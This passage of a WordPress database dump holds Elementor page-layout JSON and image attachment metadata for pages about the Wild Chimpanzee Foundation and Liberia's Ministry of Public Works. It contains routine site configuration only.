\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22012,3195,'_thumbnail_id','3084'),(22013,3195,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22015,3196,'_wp_attached_file','2019/11/mpw.jpg'),(22016,3196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2019/11/mpw.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"mpw-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mpw-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"mpw-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22017,3197,'_elementor_edit_mode','builder'),(22018,3197,'_elementor_template_type','wp-post'),(22019,3197,'_elementor_version','2.7.5'),(22020,3197,'_wp_page_template','default'),(22021,3197,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22022,3197,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22026,3199,'_wp_attached_file','2019/11/mpw-1.jpg'),(22027,3199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:17:\"2019/11/mpw-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"mpw-1-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mpw-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"mpw-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22028,3202,'_wp_attached_file','2019/11/Forest5.jpg'),(22029,3202,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2019/11/Forest5.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Forest5-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Forest5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Forest5-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22030,467,'_thumbnail_id','3202'),(22033,3205,'_wp_attached_file','2019/11/providence-island-monrovia.jpg'),(22034,3205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:38:\"2019/11/providence-island-monrovia.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"providence-island-monrovia-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"providence-island-monrovia-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"providence-island-monrovia-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22035,469,'_thumbnail_id','3205'),(22038,3207,'_wp_attached_file','2019/11/SDG.jpg'),(22039,3207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2019/11/SDG.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"SDG-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"SDG-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"SDG-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22040,476,'_thumbnail_id','3207'),(22041,3209,'_wp_attached_file','2019/11/UN-Media_Kenya_Riccardo_Gangale-1400-wide.jpg'),(22042,3209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:53:\"2019/11/UN-Media_Kenya_Riccardo_Gangale-1400-wide.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"UN-Media_Kenya_Riccardo_Gangale-1400-wide-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"UN-Media_Kenya_Riccardo_Gangale-1400-wide-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"UN-Media_Kenya_Riccardo_Gangale-1400-wide-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22043,478,'_thumbnail_id','3209'),(22044,3210,'_wp_attached_file','2019/11/liberia-ebola-orphans-07-kids.jpg'),(22045,3210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:41:\"2019/11/liberia-ebola-orphans-07-kids.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"liberia-ebola-orphans-07-kids-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"liberia-ebola-orphans-07-kids-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"liberia-ebola-orphans-07-kids-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22046,1584,'_thumbnail_id','3210'),(22047,3211,'_elementor_edit_mode','builder'),(22048,3211,'_elementor_template_type','wp-post'),(22049,3211,'_elementor_version','2.7.5'),(22050,3211,'_wp_page_template','default'),(22051,3211,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming 